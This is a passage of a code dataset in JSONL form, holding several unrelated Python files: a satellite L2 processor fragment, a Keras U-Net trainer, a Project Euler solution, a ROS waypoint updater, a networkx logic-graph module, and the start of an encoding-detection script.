l_GIPPL2COMMHandler,\n self.DataDEMMap.get(l_UniqueSatelliteD),\n constants.ReadL1Mode.READ_L1_MODE_FOR_ALGORITHMS)\n\n # ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **\n # Initialize the L2 Image file reader\n # Only in Nominal and Backward mode\n # ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **\n LOGGER.debug(\n \"Starting L2NominalProcessor::ScientificProcessing(): get the L2 product filename in the input directory...\")\n l2_image_reader = product_utils.get_input_l2_image_product(\n self._apphandler.get_input_directory(), self._apphandler, False, self.DataDEMMap.get(l_UniqueSatelliteD))\n LOGGER.info(\"The L2 product found is <\" + l2_image_reader.ProductFilename + \">.\")\n\n # ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **\n # Initialize the Output L2 Image product filename\n if self._apphandler.get_output_plugin() is not None:\n l2_image_file_writer = L2ImageWriterProvider.create(self._apphandler.get_output_plugin())\n else:\n l2_image_file_writer = L2ImageWriterProvider.create(MAJAPluginProvider.auto_tm(self._l1product.PluginName))\n if not l2_image_file_writer.can_write(self._l1product.PluginName):\n raise MajaChainException(\n \"Plugin '\" + self._apphandler.get_output_plugin() + \"' can not write product from '\" + self._l1product.PluginName + \"' products \")\n\n # ---------------------------------------------------------------------------------------------\n # Get the ozone value\n l_UseDefaultConstantOzoneAmount = self.plugin.ConfigUserCamera.get_Algorithms(). \\\n get_Atmospheric_Absorption_Correction().get_Use_Default_Constant_Ozone_Amount()\n # l_UseDefaultConstantOzoneAmount = True\n l_OzoneAmountValue = 0.0\n if not l_UseDefaultConstantOzoneAmount:\n l_OzoneAmountValue = get_ozone_amount(\n gipp_utils.get_gipp_filename(self._apphandler.get_input_directory(), \"EXO_METDTA\"),\n self._l1product.CenterCorner)\n else:\n l_OzoneAmountValue = float(l_GIPPL2COMMHandler.l2_comm_values[\"OzoneAmountDefaultValue\"])\n LOGGER.info(\"The 'OzoneAmount' used is \" + str(l_OzoneAmountValue))\n\n # Log system infos\n LOGGER.info(self._apphandler.get_system_infos())\n\n # check conditional clouds ?\n self._checking_conditional_clouds = True\n LOGGER.info(\"Starting from L2InitProcessor, the main ScientificSingleProductProcessing() method...\")\n l_enableL2resolution = self._apphandler.get_user_conf().get_Computing().get_EnableL2ResolutionProcessing()\n super(L2NominalProcessor, self).process_one_product(l_InitMode, l_BackwardMode, l_enableL2resolution,\n False, True, True, self._l1product, l1_image_reader,\n l_OzoneAmountValue, self._cams_status, l2_image_reader,\n l2_image_file_writer)\n LOGGER.info(\"Ending ScientifiqProcessing\")\n # Log system infos\n LOGGER.info(self._apphandler.get_system_infos())\n\n def post_processing(self):\n LOGGER.info(\"Starting Postprocessing\")\n","sub_path":"orchestrator/processor/l2_nominal_processor.py","file_name":"l2_nominal_processor.py","file_ext":"py","file_size_in_byte":12751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"272059984","text":"#!/usr/bin/env python\n\nimport tensorflow as tf\nimport tensorflow_datasets as tfds\n\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.backend import int_shape\nfrom tensorflow.keras.layers import Concatenate, Conv2D, Conv2DTranspose, Cropping2D, Input, MaxPooling2D, SeparableConv2D\n\n# https://idiotdeveloper.com/unet-implementation-in-tensorflow-using-keras-api/\n\ndef conv_block(input_, num_filters):\n\tx = SeparableConv2D(num_filters, 3, activation=\"relu\")(input_)\n\tx = SeparableConv2D(num_filters, 3, activation=\"relu\")(x)\n\n\treturn x\n\ndef encoder_block(input_, num_filters):\n\tx = conv_block(input_, num_filters)\n\n\treturn MaxPooling2D()(x), x\n\ndef cropping_margins(src_shape, target_shape):\n\t# https://github.com/karolzak/keras-unet/blob/9b7aff5247fff75dc4e2a11ba9c45929b9166d1f/keras_unet/models/vanilla_unet.py\n\n\tdelta_h = src_shape[1] - target_shape[1]\n\n\ttop_crop = delta_h // 2\n\tbottom_crop = delta_h // 2 if delta_h % 2 == 0 else delta_h // 2 + 1\n\n\tdelta_w = src_shape[2] - target_shape[2]\n\n\tleft_crop = delta_w // 2\n\tright_crop = delta_w // 2 if delta_w % 2 == 0 else delta_w // 2 + 1\n\n\treturn ((top_crop, bottom_crop), (left_crop, right_crop))\n\n\ndef decoder_block(input_, skipped_features, num_filters):\n\tx = Conv2DTranspose(num_filters, (2, 2), strides=2)(input_)\n\tcropped = Cropping2D(cropping=cropping_margins(int_shape(skipped_features), int_shape(x)))(skipped_features)\n\tx = Concatenate()([x, cropped])\n\tx = conv_block(x, num_filters)\n\n\treturn x\n\ndef get_model(input_shape, output_channels):\n\tinputs = Input(input_shape)\n\n\tassert input_shape[0] >= 140 and (input_shape[0] - 124) % 16 == 0, \"Input width must be of the form 16x + 124\"\n\tassert input_shape[1] >= 140 and (input_shape[1] - 124) % 16 == 0, \"Input height must be of the form 16x + 124\"\n\n\te1, s1 = encoder_block(inputs, 64)\n\te2, s2 = encoder_block(e1, 128)\n\te3, s3 = encoder_block(e2, 256)\n\te4, s4 = encoder_block(e3, 512)\n\n\tbridge = conv_block(e4, 1024)\n\n\td1 = decoder_block(bridge, s4, 512)\n\td2 = decoder_block(d1, s3, 256)\n\td3 = decoder_block(d2, s2, 128)\n\td4 = decoder_block(d3, s1, 64)\n\n\toutputs = Conv2D(output_channels, 1, activation=\"sigmoid\")(d4)\n\n\treturn Model(inputs=inputs, outputs=outputs)\n\n# https://www.tensorflow.org/tutorials/images/segmentation\n\ndataset, info = tfds.load(\"oxford_iiit_pet:3.*.*\", with_info=True)\n\n# https://www.tensorflow.org/guide/data_performance\n\n# At the bottom of the U-Net (after the last convolution that bridges the encoder and decoder), the\n# image has the most features and the lowest resolution.\nMINIMUM_SHAPE = (12, 12)\n\nINPUT_SHAPE = (MINIMUM_SHAPE[0] * 16 + 124, MINIMUM_SHAPE[1] * 16 + 124)\nOUTPUT_SHAPE = (MINIMUM_SHAPE[0] * 16 - 60, MINIMUM_SHAPE[1] * 16 - 60)\n\ndef load_datapoint(datapoint, random_flip=False):\n\tinput_image = tf.image.resize(datapoint[\"image\"], OUTPUT_SHAPE)\n\tinput_image = tf.cast(input_image, tf.float32) / 255\n\tinput_image = tf.pad(input_image, ((92, 92), (92, 92), (0, 0)), mode=\"SYMMETRIC\")\n\tinput_mask = tf.image.resize(datapoint[\"segmentation_mask\"], OUTPUT_SHAPE)\n\n\tif random_flip and tf.random.uniform(()) > 0.5:\n\t\tinput_image = tf.image.flip_left_right(input_image)\n\t\tinput_mask = tf.image.flip_left_right(input_mask)\n\n\t# The dataset's labels are within {1, 2, 3}, but the sparse categorical crossentropy loss\n\t# function expects them to be within [0, 3)\n\tinput_mask -= 1\n\n\treturn input_image, input_mask\n\nBATCH_SIZE = 6\n\ntrain_dataset = (dataset[\"train\"]\n\t.map(lambda d: load_datapoint(d, True), num_parallel_calls=tf.data.AUTOTUNE)\n\t.cache()\n\t.shuffle(16) # https://datascience.stackexchange.com/a/89319\n\t.batch(BATCH_SIZE)\n\t.repeat() # https://www.gcptutorials.com/article/how-to-use-tf.data.Dataset.repeat\n\t.prefetch(buffer_size=tf.data.AUTOTUNE))\n\ntest_dataset = (dataset[\"test\"]\n\t.map(load_datapoint)\n\t.batch(BATCH_SIZE))\n\nmodel = get_model((INPUT_SHAPE[0], INPUT_SHAPE[1], 3), 3)\nmodel.compile(\n\toptimizer=\"adam\",\n\tloss=\"sparse_categorical_crossentropy\", # https://stackoverflow.com/questions/58565394/what-is-the-difference-between-sparse-categorical-crossentropy-and-categorical-c\n\tmetrics=\"accuracy\")\n\nmodel.summary()\n\nCHECKPOINT_PATH = \"weights/cp.ckpt\"\n\n# https://www.tensorflow.org/tutorials/keras/save_and_load\ntry:\n\tmodel.load_weights(CHECKPOINT_PATH)\nexcept:\n\tprint(\"No weights were loaded.\")\n\nmodel.fit(\n\ttrain_dataset,\n\tepochs=20,\n\tcallbacks=[tf.keras.callbacks.ModelCheckpoint(\n\t\tfilepath=\"weights/cp.ckpt\",\n\t\tsave_weights_only=True,\n \tverbose=1)],\n\tvalidation_data=test_dataset,\n\tsteps_per_epoch=info.splits['train'].num_examples // BATCH_SIZE,\n\tvalidation_steps=info.splits[\"test\"].num_examples)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"247398601","text":"from func import primes\n\n__author__ = \"Bungogood\"\n\n'''\nProblem 3\n\nLargest prime factor\n'''\n\ndef f():\n largest = 1\n n = 600851475143\n for p in primes():\n while n % p == 0:\n largest = p\n n /= p\n if n == 1:\n break\n return p\n\nif __name__ == \"__main__\":\n print(f())","sub_path":"Problem-003.py","file_name":"Problem-003.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"325947710","text":"#!/usr/bin/env python\n\nimport rospy\nfrom geometry_msgs.msg import PoseStamped, TwistStamped\nfrom styx_msgs.msg import Lane, Waypoint, TrafficLightArray, TrafficLight\nfrom std_msgs.msg import Int32\nimport math\n\n'''\nThis node will publish waypoints from the car's current position to some `x` distance ahead.\n\nAs mentioned in the doc, you should ideally first implement a version which does not care\nabout traffic lights or obstacles.\n\nOnce you have created dbw_node, you will update this node to use the status of traffic lights too.\n\nPlease note that our simulator also provides the exact location of traffic lights and their\ncurrent status in `/vehicle/traffic_lights` message. You can use this message to build this node\nas well as to verify your TL classifier.\n\nTODO (for Yousuf and Aaron): Stopline location for each traffic light.\n'''\n\nLOOKAHEAD_WPS = 200 # Number of waypoints we will publish. You can change this number\n\n\nclass WaypointUpdater(object):\n def __init__(self):\n rospy.init_node('waypoint_updater')\n rospy.Subscriber('/current_velocity', TwistStamped, self.current_velocity_cb)\n rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb)\n rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb)\n print(\"Subscriptions completed\")\n self.count = 0\n #\n # Define a place to store the waypoints\n self.wps = None\n # Define a variable to define the previous waypoint of the car\n self.wp_index = None\n # TODO: Add a subscriber for /traffic_waypoint and /obstacle_waypoint below\n rospy.Subscriber('/traffic_waypoint', Int32, self.traffic_cb)\n self.final_waypoints_pub = rospy.Publisher('final_waypoints', Lane, queue_size=1)\n self.speed_limit = rospy.get_param('/waypoint_loader/velocity', 80.46)\n self.speed_limit = self.speed_limit * 1000 / 3600. # m/s\n # TODO: Add other member variables you need below\n self.lightindx = -0x7FFFFFFF\n self.stop = False\n self.isYellow = False\n self.current_linear_velocity = None\n self.current_angular_velocity = None\n self.lasta = 0.0\n self.frameno = 0\n # New\n self.stop_accel = 0.0\n self.stop_v = 0.0\n rospy.spin()\n\n def current_velocity_cb(self, msg):\n #rospy.loginfo('Current Velocity Received...')\n self.current_linear_velocity = msg.twist.linear.x\n self.current_angular_velocity = msg.twist.angular.x\n\n def pose_cb(self, msg):\n if self.wps == None: return\n self.count += 1\n # x, y, and z give the current position from the pose message\n x = msg.pose.position.x\n y = msg.pose.position.y\n z = msg.pose.position.z\n\n # if the previous waypoint of the car is unknown, find the best one\n if self.wp_index == None:\n mindist = 1000000.0\n bestind = None\n for i in range(len(self.wps)):\n xw = self.wps[i].pose.pose.position.x\n yw = self.wps[i].pose.pose.position.y\n zw = self.wps[i].pose.pose.position.z\n dist = math.sqrt((x-xw)**2+(y-yw)**2+(z-zw**2))\n if dist < mindist:\n bestind = i\n mindist = dist\n self.wp_index = bestind\n else:\n # Otherwise, increment the index to find the closest waypoint\n bestind = self.wp_index\n i = bestind\n xw = self.wps[i].pose.pose.position.x\n yw = self.wps[i].pose.pose.position.y\n zw = self.wps[i].pose.pose.position.z\n mindist = math.sqrt((x-xw)**2+(y-yw)**2+(z-zw)**2)\n while True:\n i += 1\n if i >= len(self.wps): i = 0\n xw = self.wps[i].pose.pose.position.x\n yw = self.wps[i].pose.pose.position.y\n zw = self.wps[i].pose.pose.position.z\n dist = math.sqrt((x-xw)**2+(y-yw)**2+(z-zw)**2)\n if dist > mindist: break\n mindist = dist\n bestind = i\n # Make sure that the closest waypoint selected is in front of the car, not behind it!\n # Calculate the changes in x and y from the closest waypoint to the waypoint 10 ahead\n index10 = bestind + 10 \n if index10 >= len(self.wps): index10 -= len(self.wps)\n dx = self.wps[index10].pose.pose.position.x - \\\n self.wps[bestind].pose.pose.position.x\n dy = self.wps[index10].pose.pose.position.y - \\\n self.wps[bestind].pose.pose.position.y\n # If the change in x is greater, compare best waypoint x with the position x\n # Increment bestind until the sign of the change in x to advance 10 waypoints\n # matches the sign of the change in x to move from the position x to the best wp \n if abs(dx) > abs(dy):\n if dx > 0.0: sign = 1\n else: sign = -1\n while True:\n dx = self.wps[bestind].pose.pose.position.x - x\n if dx > 0.0: signb = 1\n else: signb = -1\n if sign == signb: break\n bestind += 1\n if bestind >= len(self.wps): bestind = 0\n # If the change in y is greater, compare best waypoint y with the position y\n # Increment bestind until the sign of the changes in y to advance 10 waypoints\n # matches the sign of the change in y to move from the position y to the best wp \n else:\n if dy > 0.0: sign = 1\n else: sign = -1\n while True:\n dy = self.wps[bestind].pose.pose.position.y - y\n if dy > 0.0: signb = 1\n else: signb = -1\n if sign == signb: break\n bestind += 1\n if bestind >= len(self.wps): bestind = 0\n self.wp_index = bestind\n # if (self.count < 3):\n # print(\"Best waypoint\", bestind, self.wps[bestind].pose.pose.position.x, \\\n # self.wps[bestind].pose.pose.position.y, \\\n # self.wps[bestind].pose.pose.position.z)\n # Update the velocities of the waypoints from the bestind to bestind + LOOKAHEAD_WPS - 1\n # for now, use 10.0 m/s (about 22 MPH)\n i = bestind\n if self.current_linear_velocity != None:\n lastspeed = self.current_linear_velocity\n else:\n lastspeed = self.wps[bestind].twist.twist.linear.x\n # Calculate acceleration (in the reverse direction) to stop the car\n # before the next red (or yellow?) traffic light\n \n # if (self.count & 0x3f) == 0: print \"lightindx\", self.lightindx, self.wp_index, \\\n # self.lasta\n if self.lightindx > 0:\n stoptarget = self.lightindx - 5\n if stoptarget < 0: stoptarget += len(self.wps)\n xw = self.wps[i].pose.pose.position.x\n yw = self.wps[i].pose.pose.position.y\n \n dxl = self.wps[stoptarget].pose.pose.position.x-xw\n dyl = self.wps[stoptarget].pose.pose.position.y-yw\n s = math.sqrt(dxl*dxl + dyl*dyl)\n # Calculate difference i - light waypoint with wraparound\n di = i - stoptarget\n if di < 0: di += len(self.wps)\n if (s < 0.01): a = 9.0\n else:\n a = lastspeed * lastspeed / (s + s) #(s + s) + 1.5\n if a > 9.0: a = 9.0\n else: a = 0.0\n count = LOOKAHEAD_WPS\n finalwps = []\n v = lastspeed\n nexti = i + 1\n if nexti >= len(self.wps): nexti = 0\n if (a > 4.0) and not(self.isYellow and a >= 6.0):\n if not self.stop:\n self.stop_accel = a\n self.stop_v = v\n self.stop = True\n if self.stop:\n self.stop_v -= 0.02 * self.stop_accel\n if self.stop_v < 0.0: self.stop_v = 0.0 \n\n while True:\n if not self.stop:\n self.wps[i].twist.twist.linear.x = self.speed_limit #22.352\n else:\n xw = self.wps[i].pose.pose.position.x\n yw = self.wps[i].pose.pose.position.y\n dx = self.wps[nexti].pose.pose.position.x-xw\n dx = self.wps[nexti].pose.pose.position.y-yw\n d = math.sqrt(dx * dx + dy * dy)\n if v > .01: v -= (a + 1.0) * d/v\n else: v = 0.0\n if v < 0.0: v = 0.0\n if (i >= stoptarget) and (i <= self.lightindx): v = 0.0\n if self.stop_v < v: v = self.stop_v\n self.wps[i].twist.twist.linear.x = v\n finalwps += [self.wps[i]]\n count -= 1\n if count == 0: break\n i += 1\n if i == len(self.wps): i = 0\n # Publish\n self.lasta = a\n lane = Lane()\n lane.header.frame_id='/final'\n lane.header.stamp = rospy.Time(0)\n lane.waypoints = finalwps\n self.final_waypoints_pub.publish(lane)\n\n def waypoints_cb(self, lane):\n self.wps = lane.waypoints\n\n def traffic_cb(self, msg):\n if msg.data != -0x7FFFFFFF:\n if msg.data < 0:\n self.lightindx = -msg.data\n self.isYellow = True\n else:\n self.isYellow = False\n self.lightindx = msg.data\n else:\n self.stop = False\n self.lightindx = -0x7FFFFFFF\n\n def obstacle_cb(self, msg):\n # TODO: Callback for /obstacle_waypoint message. We will implement it later\n pass\n\n def get_waypoint_velocity(self, waypoint):\n return waypoint.twist.twist.linear.x\n\n def set_waypoint_velocity(self, waypoints, waypoint, velocity):\n waypoints[waypoint].twist.twist.linear.x = velocity\n\n def distance(self, waypoints, wp1, wp2):\n dist = 0\n dl = lambda a, b: math.sqrt((a.x-b.x)**2 + (a.y-b.y)**2 + (a.z-b.z)**2)\n for i in range(wp1, wp2+1):\n dist += dl(waypoints[wp1].pose.pose.position, waypoints[i].pose.pose.position)\n wp1 = i\n return dist\n\n\nif __name__ == '__main__':\n try:\n WaypointUpdater()\n except rospy.ROSInterruptException:\n rospy.logerr('Could not start waypoint updater node.')\n","sub_path":"ros/src/waypoint_updater/waypoint_updater.py","file_name":"waypoint_updater.py","file_ext":"py","file_size_in_byte":10359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"645030910","text":"# This KF will overhaul the design of analytical functions, because the old implementation\n# has some restrictions and is not complete.\n# Now two watch list will be added, one for AND and one for OR. A new integrity condition\n# will be enforced on KF as to how AND and OR operands are placed. This integrity condition\n# does not restrict the expressiveness of the net, and it renders convenient propreties of\n# AND and OR nodes.\n# One possible problem is that this will be a strictly first-order implementation, which\n# means I need to rethink how higher order logic is implemented. Hopefully there is no\n# problem.\n\n\n\nimport networkx\nfrom networkx import DiGraph\n\n\nclass Percipi(object):\n def __init__(self):\n pass\n\n\nclass Vision(Percipi):\n def __init__(self,id=\"\"):\n self.data = None\n self.id=id\n\n def get_data(self):\n return self.data\n\n def __repr__(self):\n return self.id\n\nclass Predicate(object):\n def __init__(self, KF=None, id=\"\"):\n self.KF = KF\n self.id = id\n self.function = None\n\n def predicate_type(self):\n return None\n\n def eval(self):\n return None\n\n def eval_add_edge(self):\n if self.eval() == True:\n self.KF.add_edge(self.KF.get_instance(), self, method=self)\n\n def get_eval_method(self):\n return None\n\n def predicate_type(self):\n return type(self).__name__\n\n def __repr__(self):\n if self.id != None:\n return self.id\n else:\n return super(Predicate, self).__repr__()\n\n\nclass AND(Predicate):\n def __init__(self, KF, predicate_set, id=None):\n super(AND, self).__init__(KF, id)\n self.predicate_set = predicate_set\n self.KF.add_edges_from([(self, i) for i in predicate_set])\n\n\nclass OR(Predicate):\n def __init__(self, KF, predicate_set, id=None):\n super(OR, self).__init__(KF, id)\n self.predicate_set = predicate_set\n self.KF.add_edges_from([(i, self) for i in predicate_set])\n\nclass Watch():\n def __init__(self, KF, AND_OR):\n self.KF = KF\n self.AND_OR = AND_OR\n self.leftover_set = self.AND_OR.predicate_set.copy()\n\n def remove(self, predicate):\n self.leftover_set.remove(predicate)\n\n def is_complete(self):\n # print(\"AND_OR set: should not be changed:\",self.AND_OR.predicate_set)\n return not self.leftover_set\n\n def get_AND_OR(self):\n return self.AND_OR\n\n def __copy__(self):\n # Should copy the predicate_set, right?\n return Watch(self.KF,self.AND_OR)\n\n\nclass Analytical(Predicate):\n def __init__(self, KF, function, predicate_tuple, id=None, method=1):\n super(Analytical, self).__init__(KF, id)\n self.function = function\n self.predicate_tuple = predicate_tuple\n self.method = method\n\n def get_eval_method(self):\n return (self.function, self.predicate_tuple)\n\n def eval(self):\n newlist = ()\n if self.method == 1:\n for i in self.predicate_tuple:\n newlist += (self.KF.hybrid_eval_I(i),)\n elif self.method == 2:\n for i in self.predicate_tuple:\n newlist += (self.KF.dynamic_eval(i),)\n else:\n raise Exception(\"Unknown proof method.\")\n return self.function(*newlist)\n # assert boolean\n # note that this eval will call hybrid_eval()\n\n\nclass Empirical_Obsolete(Predicate):\n # I am losing my sanity here.\n\n def __init__(self, neural_network):\n self.neural_network = neural_network\n\n def get(self):\n return self.neural_network\n\n def eval(self, input):\n return self.neural_network(input)\n\n\nclass Empirical(Analytical):\n def __init__(self, KF, neural_network, id=None):\n super(Empirical, self).__init__(KF, id)\n self.neural_network = neural_network\n # At the moment I will only allow neural network to directly operate upon raw data.\n self.predicatelist = (KF.get_instance())\n\n\nclass KF(DiGraph):\n def __init__(self, data=None, proof_type=1, **attr):\n # set up some eseential predicates is a default predicate\n super(KF, self).__init__(data, **attr)\n name = Predicate(id=\"name\") # name labels\n empirical = Predicate(id=\"empirical\") # neural labels.\n analytical = Predicate(id=\"analytical\") # expression labels\n dimension = Predicate(id=\"dimension\") # mutually exclusive set label\n instance = Vision(id=\"instance\")\n complement = Predicate(id=\"complement\")\n AND= Predicate(id=\"and\")\n OR=Predicate(id=\"or\")\n self.hash = {\"name\": name, \"neural\": empirical, \"function\": analytical, \"instance\": instance,\n \"dimension\": dimension, \"complement\": complement, \"and\": AND, \"or\": OR}\n super(KF, self).add_nodes_from([value for key, value in self.hash.items()])\n\n def get_node_from_hash(self, hash):\n return self.hash[hash]\n\n def add_node(self, n, name=None, attr_dict=None, **attr):\n super(KF, self).add_node(n, attr_dict, **attr)\n if name != None:\n self.add_name(n, name)\n\n def add_name(self, node, name):\n # Language is implemented this way so that I could hash a concept with a string.\n # Can I use the same method to hash with feature vector? Why or why not?\n self.add_node(name)\n self.add_edge(node, name, method=\"culture\") # The content of the word\n self.add_edge(name, self.hash[\"name\"], method=\"culture\") # This predicate is a name\n\n def find_node_by_name(self, name_string):\n # find_name does not actually give you string node, but the predicates with this name.\n # find_name is problematic, since it returns all the nodes with a name\n try:\n return self.predecessors(name_string)\n except KeyError:\n print(name_string, \"is not a word that I recognize.\")\n\n def find_node_by_name_unique(self, name_string):\n return self.find_name(name_string)[0]\n\n def successors_set(self, nlist):\n ll = []\n for n in nlist:\n ll = ll + self.successors(n)\n return set(ll)\n\n def predecessors_set(self, nlist):\n ll = []\n for n in nlist:\n ll = ll + self.predecessors(n)\n return set(ll)\n\n def find_alien(self):\n # TODO\n pass\n\n def find_trivial(self):\n # TODO\n pass\n\n def get_instance(self):\n return self.hash[\"instance\"]\n\n def static_proof(self, target, source=None, return_path=False):\n if source == None:\n source = self.get_instance()\n try:\n if return_path == True:\n return networkx.shortest_path(self, source, target)\n else:\n if networkx.shortest_path(self, source, target):\n return True\n except networkx.NetworkXNoPath:\n return False\n\n def new_AND(self, and_set, target, nontrivial=True):\n # Partially enforce non-triviality condition through initialization\n and_set=set(and_set)\n new_and = AND(self, and_set, id=' and '.join(str(e) for e in and_set))\n self.add_node(new_and)\n self.add_edges_from((new_and, e) for e in and_set)\n\n if nontrivial == True and self.shortest_path(new_and, target) != None:\n # If nontriviality matters, and indeed it's trivial\n self.remove_node(new_and)\n print(\"Trivial initiation:\", ' and '.join(str(e) for e in and_set))\n return False\n\n self.add_edge(new_and, target) # essential\n self.add_edge(new_and,self.hash[\"and\"])\n\n def new_OR(self, or_set, source, nontrivial=True):\n or_set=set(or_set)\n new_or = OR(self, or_set, id=' or '.join(str(e) for e in or_set))\n self.add_node(new_or)\n self.add_edges_from((e, new_or) for e in or_set)\n\n if nontrivial == True and self.shortest_path(source, new_or) != None:\n self.remove_node(new_or)\n print(\"Trivial initiation:\", ' or '.join(str(e) for e in or_set))\n return False\n\n self.add_edge(source, new_or)\n self.add_edge(new_or,self.hash[\"or\"])\n\n def get_and_watch(self):\n watch_list={}\n all_ands=self.predecessors(self.hash[\"and\"])\n for AND in all_ands:\n new_watch=Watch(self,AND)\n for predicate in AND.predicate_set:\n if predicate in watch_list:\n watch_list[predicate]+=[new_watch]\n else:\n watch_list[predicate]=[new_watch]\n return watch_list\n\n def get_or_watch(self):\n watch_list={}\n all_ors=self.predecessors(self.hash[\"or\"])\n for OR in all_ors:\n new_watch=Watch(self,OR)\n for predicate in OR.predicate_set:\n if predicate in watch_list:\n watch_list[predicate]+=[new_watch]\n else:\n watch_list[predicate]=[new_watch]\n return watch_list\n\n def shortest_path(self, source, target):\n results = self._bidirectional_pred_succ(source, target)\n if results == None:\n return None\n pred, succ, w = results\n\n # build path from pred+w+succ\n path = []\n # from source to w\n while w is not None:\n path.append(w)\n w = pred[w]\n path.reverse()\n # from w to target\n w = succ[path[-1]]\n while w is not None:\n path.append(w)\n w = succ[w]\n\n return path\n\n def _bidirectional_pred_succ(self, source, target):\n # Distributed calculation is not implemented, which would really help.\n # Dimensional calculation will help optimize path finding by returning false directly.\n if target == source:\n return ({target: None}, {source: None}, source)\n\n and_watch=self.get_and_watch()\n or_watch=self.get_or_watch()\n print(\"and_watch:\",and_watch)\n print(\"or_watch:\",or_watch)\n\n # G will be directed\n Gpred = self.predecessors_iter\n Gsucc = self.successors_iter\n\n pred = {source: None}\n succ = {target: None}\n\n forward_fringe = [source]\n reverse_fringe = [target]\n\n while forward_fringe and reverse_fringe:\n if len(forward_fringe) <= len(reverse_fringe):\n this_level = forward_fringe\n print(\"forward\", this_level)\n this_watch = and_watch\n forward_fringe = []\n for v in this_level:\n if v in this_watch:\n for watch in this_watch[v]:\n watch.remove(v)\n if watch.is_complete():\n w = watch.get_AND_OR()\n forward_fringe.append(w)\n pred[w] = source\n watch_elements = watch.AND_OR.predicate_set\n for predicate in watch_elements:\n this_watch[predicate].remove(watch)\n if not this_watch[predicate]:\n # If predicate has no watch associated\n this_watch.pop(predicate)\n if w in succ:\n return pred, succ, w\n for w in Gsucc(v):\n if w not in pred: # if w has not been explored\n forward_fringe.append(w)\n pred[w] = v\n if w in succ:\n return pred, succ, w\n else:\n this_level = reverse_fringe\n print(\"reverse\", this_level)\n this_watch = or_watch\n reverse_fringe = []\n for v in this_level:\n if v in this_watch:\n for watch in this_watch[v]:\n watch.remove(v)\n if watch.is_complete():\n w = watch.get_AND_OR()\n reverse_fringe.append(w)\n succ[w] = target\n watch_elements = watch.AND_OR.predicate_set\n for predicate in watch_elements:\n this_watch[predicate].remove(watch)\n if not this_watch[predicate]:\n # If predicate has no watch associated\n this_watch.pop(predicate)\n if w in pred:\n return pred, succ, w\n for w in Gpred(v):\n if w not in succ:\n reverse_fringe.append(w)\n succ[w] = v\n if w in pred:\n return pred, succ, w\n # One fringe exhausted\n while forward_fringe:\n this_level = forward_fringe\n print(\"forward\", this_level)\n this_watch = and_watch\n forward_fringe = []\n for v in this_level:\n if v in this_watch:\n for watch in this_watch[v]:\n watch.remove(v)\n if watch.is_complete():\n w = watch.get_AND_OR()\n forward_fringe.append(w)\n pred[w] = source\n # if composite is also a part of another composite, it will\n # be evaluated at the next iteration\n # Once proven, the watch is over\n watch_elements = watch.AND_OR.predicate_set\n for predicate in watch_elements:\n this_watch[predicate].remove(watch)\n if not this_watch[predicate]:\n # If predicate has no watch associated\n this_watch.pop(predicate)\n if w in succ:\n return pred, succ, w\n for w in Gsucc(v):\n if w not in pred: # if w has not been explored\n forward_fringe.append(w)\n pred[w] = v\n if w in succ:\n return pred, succ, w\n while reverse_fringe:\n this_level = reverse_fringe\n print(\"reverse\", this_level)\n this_watch = or_watch\n reverse_fringe = []\n for v in this_level:\n if v in this_watch:\n for watch in this_watch[v]:\n watch.remove(v)\n if watch.is_complete():\n w = watch.get_AND_OR()\n reverse_fringe.append(w)\n succ[w] = target\n watch_elements = watch.AND_OR.predicate_set\n for predicate in watch_elements:\n this_watch[predicate].remove(watch)\n if not this_watch[predicate]:\n # If predicate has no watch associated\n this_watch.pop(predicate)\n if w in pred:\n return pred, succ, w\n for w in Gpred(v):\n if w not in succ:\n reverse_fringe.append(w)\n succ[w] = v\n if w in pred:\n return pred, succ, w\n print(source, target)\n return None\n\n def make_dimension(self, predicate_set, method=None, name=None):\n complement = Predicate(self)\n self.add_node(complement)\n predicate_set.add(complement)\n\n dimension_handle = Analytical(self, XOR, predicate_set, id=\"Temporary:\" + str(predicate_set), method=method)\n self.add_node(dimension_handle, name)\n self.add_edge(dimension_handle, self.hash[\"dimension\"], method=method)\n self.add_edges_from([(a, dimension_handle) for a in predicate_set], method=method)\n return dimension_handle\n\n def is_dimension(self, predicate_or_name):\n if isinstance(predicate_or_name, str):\n predicate = self.find_node_by_name(predicate_or_name)\n else:\n predicate = predicate_or_name\n # Conditions:\n # Must have an analytical method that implements XOR eval function\n analytical_set = set(predicate.predicate_tuple)\n set2 = self.predecessors(predicate)\n if analytical_set != set2:\n return False\n cnt = 0\n\n # Need a hybrid_eval path finder.\n\n def add_property_node(self, property, expression):\n pass\n\n def consistency_search_through_dimensions(self, pred, error_path=False):\n # Does AND OR participate?\n # Find all paths from i to dimension. This operation is inevitable.\n # O(V+E). That's why you need sparse graph. Many nodes, compress edges with function.\n # Find duplicates in the dimensions. You cannot pass through one dimension twice.\n dimension_set = set()\n for path in networkx.all_simple_paths(self, pred, self.hash[\"dimension\"]):\n dimension = path[-2]\n if dimension in dimension_set:\n if error_path == False:\n return False\n else:\n return path\n dimension_set.add(dimension)\n return True\n\n def consistency_checking_merging(self):\n # TODO\n # Certainly you can use looped edges. But there will be consequences.\n pass\n","sub_path":"knowledgeframework/kf3.py","file_name":"kf3.py","file_ext":"py","file_size_in_byte":17982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"426256536","text":"import chardet\n\n# chcp 65001\n# https://github.com/zengbin93/jddc_solution_4th/tree/bb23cd0e557fc46ab2bf57f7a941a7ec4c54f3c4/preliminary/data_pre\n# filePath = 'test.txt'\n# filePath_new = 'test_new.txt'\n\nfilePath = 'new.txt'\nfilePath_new = 